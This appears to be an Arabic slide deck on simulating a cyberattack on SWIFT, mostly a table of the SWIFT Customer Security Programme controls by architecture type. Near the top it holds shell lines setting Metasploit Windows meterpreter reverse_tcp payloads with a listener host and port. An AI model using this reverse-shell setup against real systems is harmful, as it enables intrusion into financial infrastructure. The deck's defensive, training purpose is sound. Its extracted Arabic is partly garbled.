Professional Documents
Culture Documents
محاكات لهجوم سيبراني لمنظومة سويفت
محاكات لهجوم سيبراني لمنظومة سويفت
$ export PAYLOAD_X86=windows/meterpreter/reverse_tcp
$ export PAYLOAD_X64=windows/x64/meterpreter/reverse_tcp
$ export LHOST=192.168.6.66
$ export LPORT=6666
ً
تم إطالقه في عام 2016استجابة للهجمات اإللكترونية املتطورة التي تعرض لها مستخدمو سويفت ،يهدف برنامج أمن العمالء ( )CSPإلى الحفاظ على األمن السيبراني
املناسب األمني بطريقة عملية لجميع املستخدمين ,الحد من مخاطر الهجمات اإللكترونية وتقليل األثر املالي للمعامالت االحتيالية .املعامالت االحتيالية
تأكيد االمتثال كل سنة
تعتمد جميع الضوابط على ثالثة أهداف رئيسية:
تأمين بيئتك
التحكم في الوصول والحد من الوصول
الكشف والتفاعل
أهداف ومبادئ اإلطار
3أهداف تقييد الوصول إلى اإلنترنت وفصل األنظمة املهمة عن بيئة تكنولوجيا املعلومات العامة والبيئة املكتبية
تقليل سطح الهجوم ونقاط الضعف
ً
تأمين البيئة ماديا
32ضوابط
وضع خطة عمل في حالة وقوع حادث ومشاركة معلومة
هندسة البنيان أ 1
هندسة البنيان أ 1
هندسة البنيان أ 2
هندسة البنيان أ 3
هندسة البنيان أ 4
هندسة البنيان ب
الضوابط
نوع هندسة البنيان
1محاصرة وصول اإلنترنت وحماية األنظمة الحاسمة من البيئة العامة لتقنية المعلومات
مراقبة حساب المستخدم المميز في نظام التشغيل 1.2 ● ● ● ● ●
قيود الوصول إلى اإلنترنت 1.4 ● ● ● ● ●
ال ضوابط األمنية اإللزامية واالستشارية A1 A2 A3 A4 B
2تقليل سطح ال هجوم وال ثغرات
الحماية الداخلية لتدفق البيانات 2.1 ● ● ●
تحديثات األمان 2.2 ● ● ● ● ●
تقوية النظام 2.3 ● ● ● ● ●
أمان تدفق البيانات في النظام الخلفي 2.4A ● ● ● ● ●
حماية بيانات النقل الخارجية 2.5A ● ● ● ●
سرية فتحة المشغل ونزاهتها 2.6 ● ● ● ● ●
فحص الضعف األمني 2.7 ● ● ● ● ●
المفوضة 2.8
َّ حماية األنشطة الحرجة ● ● ● ● ●
تحكمات التعامالت التجارية 2.9 ● ● ● ● ●
تطوير تطبيق الحماية 2.10 ● ● ●
تحكمات أعمال آر إم آي 2.11A ● ● ● ● ●
الضوابط
نوع هندسة البنيان
ال ضوابط األمنية اإللزامية واالستشارية A1 A2 A3 A4 B
3تأمين البيئة ماديا ً
األمن المادي 3.1 ● ● ● ● ●
4منع اختراق بيانات االعتماد
سياسة كلمة المرور 4.1 ● ● ● ● ●
المصادقة العاملة بعوامل متعددة 4.2 ● ● ● ● ●
5إدارة ال هويات وفصل االمتيازات
التحكم في الوصول 5.1 ● ● ● ● ●
إدارة الوصول التعريفي 5.2 ● ● ● ● ●
عملية فحص العاملين 5.3A ● ● ● ● ●
حماية مستودع كلمات المرور 5.4 ● ● ● ● ●
الضوابط
نوع هندسة البنيان
ال ضوابط األمنية اإللزامية واالستشارية A1 A2 A3 A4 B
6كشف النشاط غير ال طبيعي في أنظمة أو سجالت المعامالت
حماية ضد البرامج الضارة 6.1 ● ● ● ● ●
سالمة البرمجيات 6.2 ● ● ● ●
تكامل قاعدة البيانات 6.3 ● ● ●
التسجيل والمراقبة 6.4 ● ● ● ● ●
الكشف عن التسلل 6.5A ● ● ● ●
7خطة استجابة للحوادث ومشاركة المعلومات
تخطيط استجابة الحوادث السيبرانية 7.1 ● ● ● ● ●
التدريب والتوعية األمنية 7.2 ● ● ● ● ●
اختبار االختراق 7.3A ● ● ● ● ●
تقييم المخاطر بنا ًء على السيناريو 7.4A ● ● ● ● ●
النموذج الموصي به
شكراً على حسن االنتباه